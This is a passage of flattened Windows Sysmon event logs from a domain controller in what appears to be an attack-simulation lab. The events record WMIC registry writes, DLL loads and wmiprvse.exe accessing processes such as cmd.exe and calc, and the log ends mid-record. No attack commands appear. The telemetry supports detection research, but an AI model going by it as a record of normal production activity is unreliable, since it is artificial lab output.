12241200x800000000000000057349863Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349862Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349861Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349860Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349859Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349858Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349857Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349856Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349855Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349854Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349853Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349852Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349851Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349850Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349849Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057349848Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057349847Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057349846Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057349845Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057349844Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057349843Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057349842Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.811{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache 734700x800000000000000057349841Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.811{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 13241300x800000000000000057349840Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.809{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefixVisited: 13241300x800000000000000057349839Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.809{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefixCookie: 13241300x800000000000000057349838Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.808{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix(Empty) 10341000x800000000000000057349837Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.807{8B6011A9-886D-6164-0C00-00000000F101}8489544C:\Windows\system32\svchost.exe{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000057349836Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.807{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettingsBinary Data 12241200x800000000000000057349835Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.807{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 12241200x800000000000000057349834Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.807{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 13241300x800000000000000057349833Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.807{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000) 12241200x800000000000000057349832Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.807{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings 12241200x800000000000000057349831Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.807{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 12241200x800000000000000057349830Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.807{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 734700x800000000000000057349829Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.806{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 13241300x800000000000000057349828Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.806{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057349827Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.806{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 734700x800000000000000057349826Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.806{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\winnsi.dll10.0.14393.2339 (rs1_release_inmarket.180611-1502)Network Store Information RPC interfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationwinnsi.dllMD5=25B3BD4D63460EE4599F5631C1B83D21,SHA256=07E055D47940F09CB7EB512D52672C944D7D2F035A2F45766319871C0862C5B1trueMicrosoft WindowsValid 13241300x800000000000000057349825Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.806{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057349824Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.806{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 12241200x800000000000000057349823Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.790{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap 734700x800000000000000057349822Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.790{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=B52ACA309FD6F72105951FFBA022327B,SHA256=02AB6CCE4BF0D3F075D5E982F5A4CBDB514CE7C245EA474D7846A86CD3F13202trueMicrosoft WindowsValid 12241200x800000000000000057349821Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.790{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 734700x800000000000000057349820Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.790{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\winhttp.dll10.0.14393.4467 (rs1_release.210604-1844)Windows HTTP ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationwinhttp.dllMD5=8893BE5829B2F909E7FC4AF4C43B54F9,SHA256=C1D791C72417FD001E2A5FE441717881D43428A931724E7FD2DCCE6C83699458trueMicrosoft WindowsValid 734700x800000000000000057349819Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.790{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\OnDemandConnRouteHelper.dll10.0.14393.4169 (rs1_release.210107-1130)On Demand Connctiond Route HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationOnDemandConnRouteHelper.dllMD5=BAE78E97BEBB832376654560305922E3,SHA256=6A188DC4F1005E46CCA529E9C757D9B3B5F98E5587AFAA5E4200C7DD2AC73355trueMicrosoft WindowsValid 734700x800000000000000057349818Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.790{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x800000000000000057349817Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.790{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x800000000000000057349816Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.790{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=1D7997E3AFC26B85024D33F835E18056,SHA256=B2376967E156D4971FB66059F6367030AF937943D2EBF80AF856E643B6E95BBFtrueMicrosoft WindowsValid 10341000x800000000000000057349815Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.758{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349814Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.758{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-5BAC-618E-60F3-04000000F101}360C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349813Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.758{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349812Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.758{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349811Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.758{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8B2D-618D-C4DA-04000000F101}8884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349810Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.758{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8B2C-618D-C2DA-04000000F101}6044C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349809Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.758{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349808Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 